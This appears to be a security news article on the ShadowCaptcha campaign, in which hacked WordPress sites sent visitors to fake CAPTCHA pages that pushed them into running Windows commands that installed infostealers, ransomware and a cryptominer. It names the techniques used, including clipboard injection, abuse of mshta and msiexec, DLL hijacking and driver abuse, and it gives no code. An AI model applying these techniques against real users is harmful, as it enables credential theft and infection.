ShadowCaptcha: A New Malware Campaign Uses Fake CAPTCHAs to Steal Data
In August of this year, specialists from Israel’s National Digital Agency uncovered a large-scale campaign known as ShadowCaptcha, designed to compromise users through more than a hundred hacked WordPress websites. These sites had been injected with malicious scripts that redirected visitors to counterfeit CAPTCHA verification pages disguised as services from Google and Cloudflare. The fraudulent pages employed the ClickFix technique, coercing victims into executing Windows commands, thereby opening the door to malware installation.
Researchers highlight that ShadowCaptcha combines social engineering, the abuse of native Windows utilities, and multi-stage payload delivery. The operators’ primary objectives include credential and browser data theft, illicit cryptocurrency mining, and the deployment of ransomware. Infections typically began via two vectors: either through the Run dialog, which invoked msiexec.exe and mshta.exe to deliver Lumma and Rhadamanthys, or through an HTA file that triggered the installation of the Epsilon Red ransomware. Similar ClickFix and HTA techniques had previously been documented by CloudSEK researchers.
The fake CAPTCHA pages automatically executed obfuscated JavaScript, which used the navigator.clipboard.writeText function to copy malicious commands into the victim’s clipboard, ready to be accidentally pasted and launched. To conceal its activity, the campaign employed anti-debugging mechanisms that blocked browser developer tools, as well as DLL hijacking techniques that allowed the malware to masquerade as legitimate processes.
In certain instances, ShadowCaptcha deployed the XMRig cryptominer, whose configuration was not hardcoded but dynamically retrieved from Pastebin, enabling attackers to update parameters without modifying the binaries. To further optimize mining efficiency, the malware exploited the vulnerable driver WinRing0x64.sys, granting kernel-level access to CPU registers.
The majority of compromised sites were hosted in Australia, Brazil, Italy, Canada, Colombia, and Israel, with victims spanning industries as diverse as technology, healthcare, hospitality, law, and real estate. The exact method of compromise remains unclear, though researchers report medium confidence that the attackers relied on exploit kits targeting vulnerable plugins, as well as stolen administrator credentials.
To mitigate risks, experts advise organizations to train staff in recognizing ClickFix campaigns, segment networks to limit the spread of malicious processes, and ensure that WordPress installations are kept up to date, with administrative accounts secured via multi-factor authentication.
Researchers emphasize that ShadowCaptcha illustrates the ongoing evolution of social engineering, shifting toward layered attacks that intertwine Windows utilities, obfuscated scripts, and the exploitation of vulnerable drivers—an increasingly sophisticated convergence of technical and psychological tactics.
